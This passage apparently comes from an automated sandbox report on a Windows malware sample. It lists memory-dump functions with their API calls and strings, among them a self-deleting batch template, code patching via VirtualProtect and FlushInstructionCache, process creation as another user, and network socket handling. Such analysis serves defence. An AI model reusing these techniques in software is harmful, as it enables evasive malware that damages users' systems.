Part of subcall function 00FD5482: memset.MSVCRT ref: 00FD557E
Part of subcall function 00FD5482: CloseHandle.KERNEL32(000000FF), ref: 00FD55B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FD9CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FD9D5B

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D87
SetEvent.KERNEL32 ref: 00C39D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C39DAD

Part of subcall function 00C3E4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E4E9
Part of subcall function 00C3E4B6: Sleep.KERNEL32(000001F4), ref: 00C3E57E

Part of subcall function 00C444FB: FindFirstFileW.KERNEL32(?,?), ref: 00C4452C
Part of subcall function 00C444FB: FindNextFileW.KERNEL32(?,?), ref: 00C4457E
Part of subcall function 00C444FB: FindClose.KERNEL32 ref: 00C44589
Part of subcall function 00C444FB: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C44595
Part of subcall function 00C444FB: RemoveDirectoryW.KERNEL32(00000000), ref: 00C4459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39DF1

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C410E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4113B
Part of subcall function 00C410E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C411A5
Part of subcall function 00C410E0: RegFlushKey.ADVAPI32(00000000), ref: 00C411D3
Part of subcall function 00C410E0: RegCloseKey.ADVAPI32(00000000), ref: 00C411DA

CharToOemW.USER32(?,?), ref: 00C39E6F
CharToOemW.USER32(?,?), ref: 00C39E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00C39EEC

Part of subcall function 00C35482: CharToOemW.USER32(?,?), ref: 00C354C8
Part of subcall function 00C35482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00C354FF
Part of subcall function 00C35482: CloseHandle.KERNEL32(000000FF), ref: 00C35527
Part of subcall function 00C35482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00C35569
Part of subcall function 00C35482: memset.MSVCRT ref: 00C3557E
Part of subcall function 00C35482: CloseHandle.KERNEL32(000000FF), ref: 00C355B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C39CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C39D5B

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD52FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00FD530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00FD532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00FD5339
memset.MSVCRT ref: 00FD5379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00FD53C6
CloseHandle.KERNEL32(?), ref: 00FD53DA
CloseHandle.KERNEL32(?), ref: 00FD53E0
FreeLibrary.KERNEL32 ref: 00FD53F4

Strings

userenv.dll, xrefs: 00FD5304
CreateEnvironmentBlock, xrefs: 00FD5327
DestroyEnvironmentBlock, xrefs: 00FD5333
D, xrefs: 00FD53BA

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C352FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00C3530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00C3532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00C35339
memset.MSVCRT ref: 00C35379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00C353C6
CloseHandle.KERNEL32(?), ref: 00C353DA
CloseHandle.KERNEL32(?), ref: 00C353E0
FreeLibrary.KERNEL32 ref: 00C353F4

Strings

userenv.dll, xrefs: 00C35304
CreateEnvironmentBlock, xrefs: 00C35327
DestroyEnvironmentBlock, xrefs: 00C35333
D, xrefs: 00C353BA

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 00FEC43C: lstrlenW.KERNEL32 ref: 00FEC443
Part of subcall function 00FEC43C: memcpy.MSVCRT ref: 00FEC4D1

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

getpeername.WS2_32(?,?,?), ref: 00FF6361

Part of subcall function 00FF306E: memcmp.MSVCRT ref: 00FF3090

lstrcpyW.KERNEL32(?,0:0), ref: 00FF63E9

Part of subcall function 00FF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00FF3C98
Part of subcall function 00FF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00FF3CA2

Part of subcall function 00FF2755: EnterCriticalSection.KERNEL32(01003510,?,00FF30AF,?,?,00000000), ref: 00FF2765
Part of subcall function 00FF2755: LeaveCriticalSection.KERNEL32(01003510,?,00000000), ref: 00FF278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 00FF63D5

Strings

mSER, xrefs: 00FF6176
hASS, xrefs: 00FF617D
U, xrefs: 00FF61F1
lYPE, xrefs: 00FF6279
~EAT, xrefs: 00FF6280
hASV, xrefs: 00FF6287
kTAT, xrefs: 00FF62C3
tIST, xrefs: 00FF62CA
0, xrefs: 00FF63C4
0:0, xrefs: 00FF63DF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C5611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 00C4C43C: lstrlenW.KERNEL32 ref: 00C4C443
Part of subcall function 00C4C43C: memcpy.MSVCRT ref: 00C4C4D1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

getpeername.WS2_32(?,?,?), ref: 00C56361

Part of subcall function 00C5306E: memcmp.MSVCRT ref: 00C53090

lstrcpyW.KERNEL32(?,0:0), ref: 00C563E9

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(00C63510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(00C63510,?,00000000), ref: 00C5278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 00C563D5

Strings

mSER, xrefs: 00C56176
hASS, xrefs: 00C5617D
U, xrefs: 00C561F1
lYPE, xrefs: 00C56279
~EAT, xrefs: 00C56280
hASV, xrefs: 00C56287
kTAT, xrefs: 00C562C3
tIST, xrefs: 00C562CA
0, xrefs: 00C563C4
0:0, xrefs: 00C563DF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 00FCE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00FCE376
Part of subcall function 00FCE35B: PathAddBackslashW.SHLWAPI(?), ref: 00FCE3A0
Part of subcall function 00FCE35B: CreateDirectoryW.KERNEL32(?), ref: 00FCE457
Part of subcall function 00FCE35B: SetFileAttributesW.KERNEL32(?), ref: 00FCE468
Part of subcall function 00FCE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00FCE481
Part of subcall function 00FCE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00FCE492

CharToOemW.USER32(?,?), ref: 00FD54C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00FD54FF

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CloseHandle.KERNEL32(000000FF), ref: 00FD5527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00FD5569
memset.MSVCRT ref: 00FD557E
CloseHandle.KERNEL32(000000FF), ref: 00FD55B9

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Strings

.bat, xrefs: 00FD549C
@echo off%sdel /F "%s", xrefs: 00FD54D9
/c "%s", xrefs: 00FD5534
ComSpec, xrefs: 00FD5564
D, xrefs: 00FD559E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FF5C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00FF5C89

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00FF5CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00FF5CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00FF5CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00FF5CE5

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

FreeLibrary.KERNEL32 ref: 00FF5D1A

Strings

cabinet.dll, xrefs: 00FF5C84
FCICreate, xrefs: 00FF5CB1
FCIAddFile, xrefs: 00FF5CBD
FCIFlushCabinet, xrefs: 00FF5CCC
FCIDestroy, xrefs: 00FF5CDB

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C55C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00C55C89

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00C55CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00C55CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00C55CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00C55CE5

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

FreeLibrary.KERNEL32 ref: 00C55D1A

Strings

cabinet.dll, xrefs: 00C55C84
FCICreate, xrefs: 00C55CB1
FCIAddFile, xrefs: 00C55CBD
FCIFlushCabinet, xrefs: 00C55CCC
FCIDestroy, xrefs: 00C55CDB

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00FD6861: memchr.MSVCRT ref: 00FD689D
Part of subcall function 00FD6861: memcmp.MSVCRT ref: 00FD68BC

VirtualProtect.KERNEL32(?,00FD37D4,00000080,?), ref: 00FD35ED
VirtualProtect.KERNEL32(?,00FD37D4,00000000,?), ref: 00FD3756

Part of subcall function 00FD6A7D: memcpy.MSVCRT ref: 00FD6A9C

Part of subcall function 00FD6B09: memcmp.MSVCRT ref: 00FD6B29

GetCurrentThread.KERNEL32 ref: 00FD36AC
GetThreadPriority.KERNEL32 ref: 00FD36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00FD36C6
Sleep.KERNEL32(00000000), ref: 00FD36CA
memcpy.MSVCRT ref: 00FD36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00FD36EA
SetThreadPriority.KERNEL32 ref: 00FD36F2

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

GetTickCount.KERNEL32 ref: 00FD370D
GetTickCount.KERNEL32 ref: 00FD371A
Sleep.KERNEL32(00000000), ref: 00FD3727

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00C36861: memchr.MSVCRT ref: 00C3689D
Part of subcall function 00C36861: memcmp.MSVCRT ref: 00C368BC

VirtualProtect.KERNEL32(?,00C337D4,00000080,?), ref: 00C335ED
VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

Part of subcall function 00C36B09: memcmp.MSVCRT ref: 00C36B29

GetCurrentThread.KERNEL32 ref: 00C336AC
GetThreadPriority.KERNEL32 ref: 00C336B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Sleep.KERNEL32(00000000), ref: 00C336CA
memcpy.MSVCRT ref: 00C336D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
SetThreadPriority.KERNEL32 ref: 00C336F2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetTickCount.KERNEL32 ref: 00C3370D
GetTickCount.KERNEL32 ref: 00C3371A
Sleep.KERNEL32(00000000), ref: 00C33727

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCCECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 00FCCEE3

Part of subcall function 00FD5AF5: InitializeCriticalSection.KERNEL32 ref: 00FD5AFC

InitializeCriticalSection.KERNEL32(?), ref: 00FCCF47
memset.MSVCRT ref: 00FCCF5E
InitializeCriticalSection.KERNEL32(?), ref: 00FCCF78

Part of subcall function 00FCFBE6: memset.MSVCRT ref: 00FCFBFD
Part of subcall function 00FCFBE6: memset.MSVCRT ref: 00FCFCD4

InitializeCriticalSection.KERNEL32(?), ref: 00FCCFD2
memset.MSVCRT ref: 00FCCFDD
memset.MSVCRT ref: 00FCCFEB

Part of subcall function 00FEFA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFB0C
Part of subcall function 00FEFA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFB4D
Part of subcall function 00FEFA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FEFB5C
Part of subcall function 00FEFA0A: SetEvent.KERNEL32 ref: 00FEFB6C
Part of subcall function 00FEFA0A: GetExitCodeThread.KERNEL32(?,?), ref: 00FEFB80
Part of subcall function 00FEFA0A: CloseHandle.KERNEL32 ref: 00FEFB96

Part of subcall function 00FCBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00FCC08A
Part of subcall function 00FCBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00FCC09C
Part of subcall function 00FCBFFE: socket.WS2_32(?,00000001,00000006), ref: 00FCC0CF
Part of subcall function 00FCBFFE: socket.WS2_32(?,00000002,00000011), ref: 00FCC0E0
Part of subcall function 00FCBFFE: closesocket.WS2_32(00000002), ref: 00FCC0FF
Part of subcall function 00FCBFFE: closesocket.WS2_32 ref: 00FCC106
Part of subcall function 00FCBFFE: memset.MSVCRT ref: 00FCC1C8
Part of subcall function 00FCBFFE: memcpy.MSVCRT ref: 00FCC3C8

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 00FCD061

Part of subcall function 00FD5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5B48
Part of subcall function 00FD5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FD5B6C
Part of subcall function 00FD5B40: CloseHandle.KERNEL32 ref: 00FD5B7C
Part of subcall function 00FD5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5BAC

Part of subcall function 00FCC41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC44D
Part of subcall function 00FCC41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC4DF
Part of subcall function 00FCC41C: SetEvent.KERNEL32 ref: 00FCC532
Part of subcall function 00FCC41C: SetEvent.KERNEL32 ref: 00FCC56B
Part of subcall function 00FCC41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC5F0

Part of subcall function 00FD229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,00FCD154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00FD22BD
Part of subcall function 00FD229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00FCD154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00FD22D9

Part of subcall function 00FD3172: memset.MSVCRT ref: 00FD328F
Part of subcall function 00FD3172: memcpy.MSVCRT ref: 00FD32A2
Part of subcall function 00FD3172: memcpy.MSVCRT ref: 00FD32B8

Part of subcall function 00FF2D0B: accept.WS2_32(?,0000EA60), ref: 00FF2D2C
Part of subcall function 00FF2D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00FF2D3E
Part of subcall function 00FF2D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00FCD163,?), ref: 00FF2D6F
Part of subcall function 00FF2D0B: shutdown.WS2_32(?,00000002), ref: 00FF2D87
Part of subcall function 00FF2D0B: closesocket.WS2_32 ref: 00FF2D8E
Part of subcall function 00FF2D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00FCD163), ref: 00FF2D95

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

Part of subcall function 00FCC5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00FCD203,?,?,00000000,?,?,?,?,00000000), ref: 00FCC631
Part of subcall function 00FCC5FE: memcmp.MSVCRT ref: 00FCC67F
Part of subcall function 00FCC5FE: SetEvent.KERNEL32 ref: 00FCC6C0
Part of subcall function 00FCC5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCC6ED

Part of subcall function 00FD5C67: EnterCriticalSection.KERNEL32(0111201C,?,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5C70
Part of subcall function 00FD5C67: LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5C7A
Part of subcall function 00FD5C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00FD5CA0
Part of subcall function 00FD5C67: EnterCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5CB8
Part of subcall function 00FD5C67: LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FE4EA8,?,?,00000001), ref: 00FD5CC2

CloseHandle.KERNEL32(?), ref: 00FCD260
CloseHandle.KERNEL32(?), ref: 00FCD26D

Part of subcall function 00FEFE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00FEFB19,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFE4D
Part of subcall function 00FEFE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00FEFB19,?,77C475F0,7C809F91,?,?,?,?,00FCD004,00000000), ref: 00FEFE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCD283

Part of subcall function 00FCFCFF: memset.MSVCRT ref: 00FCFD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCD2A2
CloseHandle.KERNEL32(?), ref: 00FCD2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCD2B9

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD5B10: CloseHandle.KERNEL32 ref: 00FD5B20
Part of subcall function 00FD5B10: DeleteCriticalSection.KERNEL32(?,?,01112010,00FE4EB9,?,?,00000001), ref: 00FD5B37

Part of subcall function 00FCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FCCEB9

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2CECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 00C2CEE3

Part of subcall function 00C35AF5: InitializeCriticalSection.KERNEL32 ref: 00C35AFC

InitializeCriticalSection.KERNEL32(?), ref: 00C2CF47
memset.MSVCRT ref: 00C2CF5E
InitializeCriticalSection.KERNEL32(?), ref: 00C2CF78

Part of subcall function 00C2FBE6: memset.MSVCRT ref: 00C2FBFD
Part of subcall function 00C2FBE6: memset.MSVCRT ref: 00C2FCD4

InitializeCriticalSection.KERNEL32(?), ref: 00C2CFD2
memset.MSVCRT ref: 00C2CFDD
memset.MSVCRT ref: 00C2CFEB

Part of subcall function 00C4FA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB0C
Part of subcall function 00C4FA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB4D
Part of subcall function 00C4FA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4FB5C
Part of subcall function 00C4FA0A: SetEvent.KERNEL32 ref: 00C4FB6C
Part of subcall function 00C4FA0A: GetExitCodeThread.KERNEL32(?,?), ref: 00C4FB80
Part of subcall function 00C4FA0A: CloseHandle.KERNEL32 ref: 00C4FB96

Part of subcall function 00C2BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
Part of subcall function 00C2BFFE: GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
Part of subcall function 00C2BFFE: closesocket.WS2_32(00000002), ref: 00C2C0FF
Part of subcall function 00C2BFFE: closesocket.WS2_32 ref: 00C2C106
Part of subcall function 00C2BFFE: memset.MSVCRT ref: 00C2C1C8
Part of subcall function 00C2BFFE: memcpy.MSVCRT ref: 00C2C3C8

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 00C2D061

Part of subcall function 00C35B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
Part of subcall function 00C35B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
Part of subcall function 00C35B40: CloseHandle.KERNEL32 ref: 00C35B7C
Part of subcall function 00C35B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Part of subcall function 00C2C41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C44D
Part of subcall function 00C2C41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C4DF
Part of subcall function 00C2C41C: SetEvent.KERNEL32 ref: 00C2C532
Part of subcall function 00C2C41C: SetEvent.KERNEL32 ref: 00C2C56B
Part of subcall function 00C2C41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C5F0

Part of subcall function 00C3229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00C322BD
Part of subcall function 00C3229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00C2D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00C322D9

Part of subcall function 00C33172: memset.MSVCRT ref: 00C3328F
Part of subcall function 00C33172: memcpy.MSVCRT ref: 00C332A2
Part of subcall function 00C33172: memcpy.MSVCRT ref: 00C332B8

Part of subcall function 00C52D0B: accept.WS2_32(?,0000EA60), ref: 00C52D2C
Part of subcall function 00C52D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00C52D3E
Part of subcall function 00C52D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163,?), ref: 00C52D6F
Part of subcall function 00C52D0B: shutdown.WS2_32(?,00000002), ref: 00C52D87
Part of subcall function 00C52D0B: closesocket.WS2_32 ref: 00C52D8E
Part of subcall function 00C52D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163), ref: 00C52D95

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C2C5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000), ref: 00C2C631
Part of subcall function 00C2C5FE: memcmp.MSVCRT ref: 00C2C67F
Part of subcall function 00C2C5FE: SetEvent.KERNEL32 ref: 00C2C6C0
Part of subcall function 00C2C5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2C6ED

Part of subcall function 00C35C67: EnterCriticalSection.KERNEL32(0000000C,?,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C70
Part of subcall function 00C35C67: LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C7A
Part of subcall function 00C35C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C35CA0
Part of subcall function 00C35C67: EnterCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CB8
Part of subcall function 00C35C67: LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CC2

CloseHandle.KERNEL32(?), ref: 00C2D260
CloseHandle.KERNEL32(?), ref: 00C2D26D

Part of subcall function 00C4FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE4D
Part of subcall function 00C4FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D283

Part of subcall function 00C2FCFF: memset.MSVCRT ref: 00C2FD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D2A2
CloseHandle.KERNEL32(?), ref: 00C2D2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2D2B9

